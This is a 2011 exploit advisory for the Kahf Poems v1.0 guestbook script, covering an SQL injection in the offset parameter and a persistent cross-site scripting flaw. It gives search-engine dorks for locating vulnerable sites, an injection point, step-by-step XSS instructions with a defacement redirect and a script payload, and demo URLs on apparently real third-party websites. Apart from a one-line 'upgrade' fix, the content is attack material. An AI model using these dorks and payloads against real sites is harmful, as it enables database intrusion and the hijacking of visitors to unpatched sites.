67 lines
No EOL
3.1 KiB
Text
67 lines
No EOL
3.1 KiB
Text
################################################################################################
|
|
[+] Title : Kahf Poems V1.0 (guestbook.php) SQL Injection
|
|
[+] Name : Kahf Poems
|
|
[+] Affected Version : v1.0
|
|
[+] Software Link : http://www.traidnt.net/vb/traidnt19736/
|
|
[+] Tested on : (L):Vista & Windows Xp and Windows 7
|
|
[+] Date : 13/08/2011
|
|
[+] Dork : "intitle:Kahf Poems -> v 1.0 beta" & "inurl:guestbook.php?diwan_id="
|
|
#################################################################################################
|
|
[+] Author : Yassin Aboukir
|
|
[+] Contact : 01Xp01@Gmail.com
|
|
[+] Site : http://www.yaboukir.com
|
|
#################################################################################################
|
|
|
|
|
|
[+] Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',10' at line 1
|
|
|
|
[+] How to exploit :
|
|
|
|
http://localhost/Path/guestbook.php?diwan_id=8&action=view&offset=1[SQL HERE]
|
|
|
|
[+] Fix : upgrade to last release (v3)
|
|
|
|
|
|
[+] Special Thanks to Ayoub Aboukir & All Friends ...
|
|
|
|
[+] Demos :
|
|
http://www.yaaam.com/poems/guestbook.php?diwan_id=8&action=view&offset=1'
|
|
http://www.yaaam.com/poems/guestbook.php?diwan_id=8&action=view&offset=5860'
|
|
|
|
################################################################################################
|
|
[+] Title : Kahf Poems V1.0 (guestbook.php) Persistent XSS
|
|
[+] Name : Kahf Poems
|
|
[+] Affected Version : v1.0
|
|
[+] Software Link : http://www.traidnt.net/vb/traidnt19736/
|
|
[+] Tested on : (L):Vista & Windows Xp and Windows 7
|
|
[+] Date : 13/08/2011
|
|
[+] Dork : "intitle:Kahf Poems -> v 1.0 beta" & "inurl:guestbook.php?diwan_id="
|
|
#################################################################################################
|
|
[+] Author : Yassin Aboukir
|
|
[+] Contact : 01Xp01@Gmail.com
|
|
[+] Site : http://www.yaboukir.com
|
|
#################################################################################################
|
|
|
|
[+] Details : Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
|
|
|
|
[+] How to exploit :
|
|
|
|
1- Go there : http://localhost/Path/guestbook.php?action=addnew&diwan_id=1 .
|
|
|
|
2- Put in Body field the XSS Code.
|
|
Example 1: <META http-equiv="refresh" content="0;URL=http://www.Deface-page.com"> .
|
|
Example 2: <script>alert('Xssed by The W0rm')</script>
|
|
|
|
3- Put anything in the other field ( Name & E-mail).
|
|
|
|
4- Now anyone go to the guestbook page will redirected to your own paege OR exploit your XSS Code.
|
|
|
|
|
|
[+] Fix : upgrade to last release.
|
|
|
|
|
|
[+] Special Thanks to Ayoub Aboukir & All Friends ...
|
|
|
|
[+] Demos :
|
|
http://www.yaaam.com/poems/guestbook.php?diwan_id=1&action=view&offset=0
|
|
http://www.alalarja.com/poems/guestbook.php?diwan_id=1&action=view&offset=0 |